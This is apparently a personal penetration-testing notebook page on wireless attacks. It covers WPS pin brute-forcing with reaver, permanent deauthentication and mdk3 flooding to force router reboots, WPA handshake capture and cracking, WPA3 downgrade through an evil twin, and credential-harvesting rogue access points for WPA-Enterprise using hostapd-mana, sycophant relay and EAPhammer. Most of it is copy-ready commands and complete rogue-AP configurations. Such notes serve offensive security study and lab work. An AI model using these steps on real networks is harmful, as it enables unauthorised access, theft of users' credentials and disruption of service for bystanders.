These attacks usually fail, there are several possible sources of problems. Reaver can say that the AP is deauthenticating us, among other error messages. If WPS cracking doesn't work right away it probably won't work at all. Even if an AP's WPS is not locked the attacks can fail for other reasons. For example, some routers timeout WPS after a short time since it was activated.

There are APs that don't use a pin. With bully and reaver we can use the -p '' option to check if the pin is empty

Some APs use a pin that is linked to the first three bytes of the BSSID. Airgeddon contains them in known_pins.db

To check if a certain BSSID has known default pins, use the first three bytes of the AP (without the colon symbols, in this case XXYYZ for a BSSID= XX:YY:ZZ:AA:BB:CC)

source /usr/share/airgeddon/known_pins.db
echo ${PINDB["XXYYZZ"]}
14755989 48703970 06017637

Try manually the pins returned, if any

troubleshooting the reaver: 1- If it says it cannot associate with the AP -> we need to associate manually with aireplay-ng --fakeauth in another terminal, and keep the fake auth running while we try the reaver attack (which we must run with the -A option, so that it doesn't try to associate itself to the AP, since we already are associated via aireplay-ng)

2- Reaver says WPS transaction failed, re-trying last ping (we can see this with -vvv for debugging output). Then it retries the same pin all the time. Sometimes (we can see in the output) this is due to the use of NACK packets. We can try with the option -N (or --no-nacks) to not send them.

3- If reaver says "Waiting for beacon from XX:XX:XX:XX:XX:XX" we need to specify the channel manually (-c parameter)

4- The AP can have rate limiting enabled, and change state to locked (Lck) after some failed attempts. If we suspect the AP locked WPS, run wash again to check if it's in the Lck state. We can deauthenticate permanently all clients connected, so that someone complains or restarts the AP, so that we can continue bruteforcing pins. This is very clumsy and noisy, and if the rate limiting occurs fast it's probably going to be useless, as we will quickly lock WPS again. We can run this "permanent" deauth withsudo aireplay-ng --deauth 1000000000000 -a <AP bssid> wlan0mon

We can also try the mdk3 tool, which can cause DoS to some routers and perhaps force them to restart. Some routers unlock WPS when they restart

# DoS to an AP, with different MACs, as if it were a DDoS. Some routers reboot when too many different MACs try to connect to them because they cannot handle so many connections

# Help of the "a" option of mdk3 (used for DoS) withs
mdk3 --help a 

# DoS (-m for using real looking MACs, not arbitrary ones like 00:00:00:00:00:00)
mdk3 wlan0mon a -a <AP BSSID> -m

Clients connect in amounts of 500 and it may say that it is vulnerable, or it may not say it. When we reach about 10000 stop mdk3 and use wash to check if WPS got unlocked (if the AP rebooted it will take a while before we can get useful output from wash)

  • karma attack: the fake AP listens to probes sent by clients when they search for known APs and responds, telling them that he is the AP they are looking for

WPA/WPA2 cracking

WPA-> TKIP (based on WEP). WPA only required firmware update, for that reason it was accepted quickly WPA2 -> CCMP (based on AES). WPA2 needs new hardware to compute AES faster

# Run the following and wait for a handshake by a new client connecting to the network
sudo airodump-ng --bssid <AP bssid> --channel <channel> --write <cap file> wlan0mon

# We can also deauthenticate a client to force him to reconnect (we should see in the top right corner of the airodump-ng output tha ta handshake has been captured. I have problems with this in a VM, but not on a baremetal linux)
sudo aireplay-ng --deauth 4 -a <AP bssid> -c <client MAC> wlan0mon

# Crack the capture file
aircrack-ng <file.cap> -w <wordlist.txt>

Cracking is time consuming because of the computation of the PBKDF2 function (4096 iterations for AES). A rainbow table can be precomputed:

genpmk -f <wordlist> -d precomputed-common -s home And we can crack with a rainbow table attack:cowpatty -d <precomputed wordlist> -s <ESSID> -r <capture file.cap>

# Create the <output db> database 
airolib-ng <output db> --import passwd <wordlist>

# save to a file the ESSID that we want to crack
echo "<essid>" > <essid file>

# Import the ESSID in the DB
airolib-ng <output db> --import essid <essid file>

# Create a PMK for every password in the list
airolib-ng <output db> --batch

# Crack
aircrack-ng -r <output db> <file.cap>

AP-less networks

If we see a client probing for a network but the network is not there, probably it's using WPA/WPA2, we can create a honeypot with that network name and capture traffic with airodump, so that when he tries to connect to us we capture a handshake that we can try to crack

WPA3

It is not possible to crack WPA3. But we can try downgrade clients to WPA2 to capture a crackable handshake. This can be done with an evil twin with only WPA2 and 802.11w set to "optional".

If 802.11w is disabled, a client may never try to connect, but WPA2 clients rarely use it (and sometimes don't handle it well). The combination of only using WPA2 and 802.11w set to "optional" will gives us the highest chance that a client will be willing to downgrade.

To achieve this in the hostapd configuration: - wpa value should be set to "2"

  • there shouldn't be a wpa_pairwise parameter

  • rsn_pairwise should be set to "CCMP" only

  • To enable 802.11w, we would set ieee80211w as a new parameter with the value of "1" (indicating it is optional).

  • The latter also requires that we add "WPA-PSK-SHA256" to wpa_key_mgmt.

WPA enterprise

Each user uses his own user and password (if client certificates are not used). Each user's traffic is encrypted with a different key.In WPA enterprise we attack the clients, not the AP nor the RADIUS

Companies usually create their own CA to validate their certificates and make our forged certificates fail. For that they need to install a company certificate in every client

EAP-TTLS -> server authenicates with certificate. Client can optionally use certificate. There are versions EAP-TTLSv0 and EAP-TTLSv1. Inner auth methods: PAP, CHAP, MSCHAP, MSCHAPv2

PEAP vs TTLS: EAP-TTLS has option to use client side certificate EAP-TTLS-PAP support (cleartext passord) EAP-PEAP is a wrapper around EAP carring the EAP for authenication TTLS is a wrapper around TLVs (type length values), which are RADIUS attributes

The server gives to the client a certificate, to make sure that the client sends credentials to a trusted server

EAP

WPA-Enterprise, authentication via a RADIUS server, not on the AP

We can host a RADIUS server with freeradius to handle authentication and hostap with custom certificates to create en evil twin of a WPA-Enterprise network

EAP (RADIUS)

WPA Enterprise uses Extensible Authentication Protocol (EAP). EAP is a framework for authentication, which allows a number of different authentication schemes or methods.

Authentication is done using a Remote Authentication Dial-In User Service (RADIUS) server. The client authenticates using a number of EAP frames, depending on the agreed upon authentication scheme, which are relayed by the AP to the RADIUS server. If authentication is successful, the result is then used as Pairwise Master Key (PMK) for the 4-way handshake, as opposed to PSK, where the passphrase is derived to generate the PMK.

Authentication to a RADIUS server with most common EAP methods, requires the use of certificates on the server side at the very least. Some older, now deprecated EAP methods don't require certificates. Although a number of authentication schemes are possible, just some of them are commonly used, due to their security, and integration with existing OS. It is common to use a username and password to authenticate, which could be tied to domain credentials.

We'll go over a few EAPs commonly used on Wi-Fi networks.

EAP-TLS

EAP Transport Layer Security (EAP-TLS) is one of the most secure authentication methods, as it uses certificates on the server side and client side, instead of login and passwords, so the client and server mutually authenticate each other.

EAP-TTLS

EAP Tunneled Transport Layer Security (EAP-TTLS), as the name suggests, also uses TLS. As opposed to EAP-TLS, it does not necessarily need client certificates. It creates a tunnel and then exchanges the credentials using one of the few possible different inner methods (also called phase 2), such as Challenge-Handshake Authentication Protocol (CHAP), Authentication Protocol (PAP), Microsoft CHAP (MS-CHAP), or MS-CHAPv2.

PEAP (MS-CHAPv2 and others)

Similarly to EAP-TTLS, Protected Extensible Authentication Protocol (PEAP) also creates a TLS tunnel before credentials are exchanged. Although different methods can be used within PEAP, MS-CHAPv2 is a commonly used inner method.

PEAP and EAP-TLS mostly differ on how the data is exchanged inside the TLS tunnel.

PEAP hashes are of the type netNTLMv1, that can be cracked with -m 5500 in hashcat

Attack

The attack against WPA Enterprise consists in setting up a fake Access Point that imitates the target Access Point, so that clients connect to ours and in the process we capture hashes of their passwords, that can be cracked.

Optional: imitating the server certificates

While it usually is not necessary, we will create a certificate similar to the one from the RADIUS server that the AP serves to its clients.

if no certificates are captured when the client reauthenticates, deauthenticate him again

We can check the validity by using openssl x509 -in CERT_FILENAME -noout -enddate where CERT_FILENAME is the .pem or .crt file.

We can now disable monitor mode

wireshark filter for packets with certificate: tls.handshake.certificate [[8 - wireshark#Tshark]]

With wireshark -> Packet Details > Extensible Authentication Protocol > Transport Layer Security > TLSv1 Record Layer: Handshake Protocol: Certificate > Handshake Protocol: Certificate > Certificates > Certificate. For each of them, right click > Export Packet Bytes. Alternatively, check with [[8 - wireshark#Tshark]]

install freeradius

sudo apt install freeradius

Modify in folder /etc/freeradius/3.0/certs the files ca.cnf (certificate_authority section) and server.cnf (server section).

Run the following to regenerate diffie hellman with a 2048 bit key and create the certificates

# in /etc/freeradius/3.0/certs folder:
rm dh
make

The client error during the make command can be ignored, it's not necessary to create client certificates to get their hashes when they connect to us.

Run the command make destroycerts if you had previously created certificates, to start anew

If you don't have it, install hostapd-mana to create the fake Access Point:sudo apt install hostapd-mana

Also create the file /etc/hostapd-mana/mana.eap_user. Add the following contents to increase the chances of clients being able to connect to our fake AP

*     PEAP,TTLS,TLS,FAST
"t"   TTLS-PAP,TTLS-CHAP,TTLS-MSCHAP,MSCHAPV2,MD5,GTC,TTLS,TTLS-MSCHAPV2    "pass"   [2]

hostapd-mana for wpa-enterprise

TIPS:

  • For testing you may need to change your client settings and turn off and on the wifi, while hostapd-mana remains running all the time, capturing creentials when connection attempts happen, and only if the configuration of the client is the right one for hostapd-mana to get hashes or credentials (EAP connections). at times hostapd-mana may behave strangely after many failed connections, just rerun it, but remember that most of the tweaking happens on the client when messing with the configuration, or if we want to generate traffic, just keep hostapd-mana running and turn off and on wifi on the client after changing the config.

  • The channel doesn't matter, but if we use the same as the original it's easier to monitor both networks at once with airodump

  • Disable monitor mode to host an AP with hostapd-mana

  • If we don't clone the BSSID the channel we use doesn't matter, but if we clone it, we must use a different channel to avoid errors

  • mana adds functions that hostapd doesn't have

Options in the configuration files of hostapd-mana

  • mana_wpe=1 -> to sniff credentials

  • mana_eapsuccess=1 -> To let the victim know that he was successful when connecting to us

  • mana_credout=<file> -> Saves creds to a file

  • eap_server=1 -> Use the internal EAP server, not an external one

  • enable_mana=1 -> karma attack, respond to every client that tries to connect to us, making him believe that we are the SSID that he is probing

interface=wlan1
ssid=<ESSID>
hw_mode=g
channel=6
auth_algs=3
wpa=3
wpa_key_mgmt=WPA-EAP
wpa_pairwise=TKIP CCMP
ieee8021x=1
eap_server=1
eap_user_file=hostapd.eap_user
ca_cert=/root/certs/ca.pem
server_cert=/root/certs/server.pem
private_key=/root/certs/server.key
dh_file=/root/certs/dhparam.pem
mana_wpe=1
mana_eapsuccess=1
mana_credout=hostapd.creds

host evil twin withhostapd_mana mana.conf

Attack PEAP-GTC

interface=wlan1
ssid=<target ESSID>
channel=6
hw_mode=g
wpa=3
wpa_key_mgmt=WPA-EAP
wpa_pairwise=TKIP CCMP
auth_algs=3
ieee8021x=1
eapol_key_index_workaround=0
eap_server=1
eap_user_file=hostapd.eap_user
ca_cert=/root/certs/ca.pem
server_cert=/root/certs/server.pem
private_key=/root/certs/server.key
private_key_passwd=
dh_file=/root/certs/dhparam.pem
mana_wpe=1
mana_eapsuccess=1

karma attack-> So that many clients can connect to us simultaneously

interface=wlan1
ssid=<target ESSID>
channel=6
hw_mode=g
wpa=3
wpa_key_mgmt=WPA-EAP
wpa_pairwise=TKIP CCMP
auth_algs=3
ieee8021x=1
eap_server=1
eap_user_file=hostapd.eap_user
ca_cert=/root/certs/ca.pem
server_cert=/root/certs/server.pem
private_key=/root/certs/server.key
dh_file=/root/certs/dhparam.pem
mana_wpe=1
mana_eapsuccess=1
enable_mana=1
mana_credout=hostapd.creds

hostapd-mana returns strings to crack WPA-EAP in the following formats - asleap - john - hashcat I have found that sometimes one tool isn't able to crack it and other is (WTF?) so if one doesn't find the password try with other and the same dictionary

PEAP relay attack

More info: https://sensepost.com/blog/2019/peap-relay-attacks-with-wpa_sycophant/ https://www.youtube.com/watch?v=3FSLM1VY0SQ https://www.youtube.com/watch?v=XYgBw8mx9Jw

3 interfaces are needed:

  • wlan0 for hostapd-mana

  • wlan1 for sycophant

  • wlan2 recon and for deauthenticating clients

wlan0

file for hostapd-mana:

interface=wlan0
ssid=<target ESSID>
channel=6
hw_mode=g
wpa=3
wpa_key_mgmt=WPA-EAP
wpa_pairwise=TKIP CCMP
auth_algs=3
ieee8021x=1
eapol_key_index_workaround=0
eap_server=1
eap_user_file=hostapd.eap_user
ca_cert=/root/certs/ca.pem
server_cert=/root/certs/server.pem
private_key=/root/certs/server.key
private_key_passwd=
dh_file=/root/certs/dhparam.pem
mana_wpe=1
mana_eapsuccess=1
enable_mana=1
enable_sycophant=1
sycophant_dir=/tmp/

Run hostapd:hostapd-mana ap.conf

wlan1

sycophant configuration file:

network={
ssid="<target ESSID>"
# The SSID you would like to relay and authenticate against.
scan_ssid=1
key_mgmt=WPA-EAP
# Do not modify
identity=""
anonymous_identity=""
password=""
# This initialises the variables for me.
# -------------
eap=PEAP
phase1="crypto_binding=0 peaplabel=0"
phase2="auth=MSCHAPV2"
# Dont want to connect back to ourselves,
# so add your rogue BSSID here.
bssid_blacklist=<hostapd-mana MAC>
}

In the last line we use the MAC of the interface with hostapd-mana (wlan0 in this case)

Run with./wpa_sycophant.sh -c wpa_sycophant_example.conf -i wlan1

wlan2

Deauth a client connected to the target network so that it (hopefully) connects to our rogue AP, which will relay traffic to sycophantaireplay-ng -0 4 -a <target BSSID> -c <target client MAC> wlan2

We should see the connection in sycophant if everything goes well, and then in wlan2 we can do the following to get an IPdhclient -v wlan1

EAPhammer:

Tool to create fake APs

./eaphammer -i wlan1 --channel 6 --auth wpa-eap --essid DefenseConference --creds

# karma attack, make every client believe that we are the AP(s) that he is probing. The difference between karma attack and evil twin is that karma uses the probe requests sent by clients (from their preferred network list, PNL) and in evil twin we must guess the APs they want to connect to
./eaphammer -i wlan1 --channel 6 --auth wpa-eap --essid DefenseConference --creds --karma

EAP MD5 crack

./eapmd5pass -w dict -r eapmd5-sample.dump

Creating a Rogue AP

Evil twins can be in any channel, except if we clone the BSSID of the AP we want to impersonate, in which case the channel must be different. But APs with different BSSID and equal ESSID can coexist in the same channel.

If we get a connection in an evil twin, the connected client won't have internet access if we don't give him an IP with a dhcp server.

with hostapd, we need to be listening with airodump (on another wifi interface) at the same time that we host the fake ap, to capture handshakes of clients that try to connect to us, despite the PSK mismatch (since we don't know the real PSK but will crack it from their handshake to us)

Deauth a client if he doesn't connect to our APsudo aireplay-ng --deauth 4 -a <bssid> -c <client_MAC> wlan0mon

hostapd / hostapd-mana

hostapd-mana is an enhanced version of hostapd. Both are used for hosting fake APs, but mana includes more options to do things like dump passwords obtained from the handshake. Hostapd-mana can read hostapd config files, but also includes other options

Install

sudo apt install hostapd-mana
sudo apt install hostapd-mana

Run

hostapd a.conf
hostapd-mana a.conf

Parameters:

  • driver=nl80211 -> always the same for all linux devices

  • hw_mode=g -> 2.4 GHz y 54 Mb

  • auth_algs (this is for WEP, for WPA use the equivalent wpa parameter->

    • auth_algs=0 ->OPEN

    • auth_algs=1 ->WEP

    • auth_algs=2 -> Both

  • wep_key0 <- we can use up to 4

  • Type of security

    • wpa=3 -> activate both WPA and WPA2

    • wpa=2 -> activate only WPA2

    • wpa=1 -> activate only WPA

Type of authentication:

  • wpa_key_mgmt=WPA-PSK

  • wpa_passphrase=<passphrase> -> passphrase in the case of PSK auth, we can set anything here, we don't care it's wrong

Encryption type (if the target is exclusiveliy WPA1 or WPA2 use just one of the following):

  • wpa_pairwise=TKIP CCMP -> TKIP or CCMP encryption with WAP1

  • rsn_pairwise=TKIP CCMP -> TKIP or CCMP encryption with WPA2

- mana_wpaout-> where to save the captured handshakes (in a Hashcat hccapx format).

hostap with no encryption

interface=wlan1
ssid=hostel-A
hw_mode=g
channel=6
driver=nl80211

hostap with wep

interface=wlan1
hw_mode=g
channel=6
driver=nl80211
ssid=hostel-A
auth_algs=1
wep_default_key=0
wep_key0="54321"

hostap with WPA-PSK

interface=wlan1
hw_mode=g
channel=6
driver=nl80211
ssid=HomeAlone
auth_algs=1
wpa=1
wpa_key_mgmt=WPA-PSK
wpa_pairwise=TKIP
wpa_passphrase=welcome@123

hostap with WPA2-PSK

interface=wlan1
hw_mode=g
channel=6
driver=nl80211
ssid=Lost-in-space
auth_algs=1
wpa=1
wpa_key_mgmt=WPA-PSK
wpa_pairwise=CCMP
wpa_passphrase=beautifulsoup

# SSID 2
bss=wlan1_0
ssid=LOCOMO-Mobile-hotspot
auth_algs=1
wpa=1
wpa_key_mgmt=WPA-PSK
wpa_pairwise=CCMP
wpa_passphrase=beautifulsoup

alternative

interface=wlan1
hw_mode=g
channel=6
driver=nl80211

ssid=Lost-in-space
auth_algs=1
wpa=2
wpa_key_mgmt=WPA-PSK
rsn_pairwise=CCMP
wpa_passphrase=beautifulsoup

Hosting several APs

Two different ESSIDs with the same wifi antenna (interface wlan1). With hostap, if we want to simulate several ESSIDs, the first one must use the keyword "interface" and the real interface name, and the next ones use the keyword "bss" and we use fictitious names, like wlan1_0. This can be used if a client probes different clients.

# SSID 1
interface=wlan1
driver=nl80211
ssid=dex-net
wpa=2
wpa_passphrase=123456789
wpa_key_mgmt=WPA-PSK
rsn_pairwise=CCMP
channel=1

# SSID 2
bss=wlan1_0
ssid=dex-network
wpa=2
wpa_passphrase=123456789
wpa_key_mgmt=WPA-PSK
rsn_pairwise=CCMP
channel=1
interface=wlan0
ssid=<ESSID>
channel=1
hw_mode=g
ieee80211n=1
wpa=3
wpa_key_mgmt=WPA-PSK
wpa_passphrase=ANYPASSWORD
wpa_pairwise=TKIP
rsn_pairwise=TKIP CCMP
mana_wpaout=/home/kali/output.hccapx

Filters

  • tls.handshake.certificate -> packets containing certificates (useful in WPA enterprise)

  • wlan.fc.type_subtype == 0x08 -> beacon frames

  • wlan.ssid == "XYZ" -> specify ESSID

  • wlan.bssid == 00:01:20:43:21:12 -> filter by BSSID

  • wlan.fc.type == X -> X represents frame types: 0 (management), 1 (control), 2 (data), and 3 (extension)

  • wlan.fc.subtype == X -> X represents frame subtypes

  • wlan.fc.type_subtype in {0x0 0x1 0xb} -> EAPoL frames

  • wlan.addr == xx.xx.xx.xx.xx.xx -> search for a certain client MAC address

More examples: https://www.wifi-professionals.com/2019/03/wireshark-display-filters

Tshark

# show packets in a file
sudo tshark -r wpa-eap-tls.pcap 

# show captured packets applying a filter for packets containing certificates exchanged during handshaek
sudo tshark -r wpa-eap-tls.pcap -Y "tls.handshake.certificate" 

# show all data (-x)
sudo tshark -r wpa-eap-tls.pcap -Y "tls.handshake.certificate" -x

# show all fields in capture files (the ones filtered with -Y)
tshark -r b64.pcap -Y "tls.handshake.certificate" -T pdml

# show a specific field (in this case, the certificate)
tshark -r b64.pcap -Y "tls.handshake.certificate" -T fields -e "tls.handshake.certificate" 

# full plaintext dump of packet (the same that you can see on wireshark)
tshark -nr b64.pcap -2 -R "ssl.handshake.certificate" -V

# in JSON format, easier to read:
tshark -nr b64.pcap -2 -R "ssl.handshake.certificate" -T json -V

Tips

  • To transfer a capture file you can transfer it via scp, or encode it to base64 ( base64 wpa-eap-tls.pcap ) , copy the base64 displayed in screen (careful with large files, could result in data loss if the terminal doesn't contain many buffer lines) to a local file and decode it locally ( cat b64.txt | base64 -d > b64.pcap )

PreviousActive DirectoryNextRed Teaming

Last updated